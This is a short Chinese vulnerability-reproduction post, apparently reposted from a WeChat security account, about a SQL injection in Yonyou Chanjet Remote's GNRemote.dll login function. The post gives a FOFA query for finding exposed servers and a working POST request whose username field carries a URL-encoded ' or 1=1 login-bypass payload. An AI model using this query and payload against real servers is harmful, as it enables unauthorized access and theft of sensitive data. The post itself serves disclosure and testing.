用友畅捷通远程通 GNRemote.dll SQL注入漏洞

admin

103387
文章

87
评论

2023年7月5日14:14:43评论141 views字数 346阅读1分9秒阅读模式

- 漏洞描述 -

用友畅捷通远程通 GNRemote.dll SQL注入漏洞，攻击者通过SQL注入从而获取服务器上的敏感信息，甚至可以通过注入恶意代码来控制设备。

- 影响范围 -

用友畅捷通远程通

- FOFA -

body="远程通CHANJET_Remote"

- 漏洞复现 -

用友畅捷通远程通 GNRemote.dll SQL注入漏洞

POC

POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl
username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1

‍

抓包请求

用友畅捷通远程通 GNRemote.dll SQL注入漏洞

end

原文始发于微信公众号（安全攻防渗透）：知识分享7：用友畅捷通远程通 GNRemote.dll SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2023年7月5日14:14:43
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
用友畅捷通远程通 GNRemote.dll SQL注入漏洞https://cn-sec.com/archives/1852427.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

用友畅捷通远程通 GNRemote.dll SQL注入漏洞

漏洞预警 | Travelpayouts开放式重定向漏洞

漏洞复现-福建科立讯通信指挥调度管理平台ajax_users.php 存在SQL注入

漏洞复现-禅道身份认证绕过漏洞

用友U8-CRM客户关系管理系统downloadfile.php 任意文件读取漏洞

【0day】瑞友天翼应用虚拟化系统

QVD-2024-15263：禅道身份认证绕过漏洞

红海云ehr-RedseaPlatform-文件上传-PtFjk

魔方网表存在文件上传漏洞【附poc】

脸爱云一脸通智慧平台SystemMng信息泄露漏洞【附poc】

瑞友天翼应用虚拟化系统SQL注入致远程代码执行漏洞

发表评论

在线咨询

微信